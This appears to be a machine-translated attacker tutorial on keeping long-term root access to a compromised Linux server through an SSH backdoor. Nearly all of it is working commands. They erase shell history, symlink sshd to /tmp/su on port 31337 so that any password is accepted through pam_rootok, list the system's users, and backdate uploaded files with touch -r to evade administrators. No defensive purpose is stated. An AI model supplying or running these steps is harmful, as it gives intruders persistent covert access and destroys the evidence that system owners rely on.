Many times we need to maintain the machine won permission to join the timing of a rebound shell on the Job It is easy to spot operation and maintenance personnel, some scenes did not need to use rootkit-level back door, we can try to use ssh backdoor
1. Purpose
Long-term maintenance machine root privileges, while the back door there is a need to avoid detection management
communication hidden, since the start of the hidden, hidden files, process / module hidden, hidden registry, hidden services, hidden ports, etc.
SSH command eraser, the first execution after landing
unset HISTFILE;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace
Put spaces can no longer recorded history command before each command input
2. backdoor way
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3. Use the back door using any password system
ssh root:[email protected] -p 31338
4. see which users exist
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4 }'|more
1 # 如下 2 root|0|0 3 sync|4|65534 4 mysql|104|109 5 postgres|113|117 6 arpwatch|117|120 7 Debian-snmp|118|123 8 speech-dispatcher|127|29 9 Debian-gdm|130|138
5. Modify the upload file timestamps
touch -r old new file timestamp file timestamp
6. Exit ssh
exit
Note
Core 0.5 is an arbitrary password auth sufficient pam_rootok.so, as long as the PAM configuration file that contains this configuration to any SSH password, practice shows that can be successfully use PAM configuration file for su there except the chsh, The chfn
1. premise linux soft connection ssh ssh configuration allows the back door need to use PAM authentication
2. accused host does not allow root login, use other existing user login